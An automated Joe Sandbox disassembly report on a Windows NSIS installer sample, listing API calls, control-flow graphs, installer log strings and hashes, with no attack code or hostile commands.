• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 310444273-0

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
Memory Dump Source
• Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
Memory Dump Source
• Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
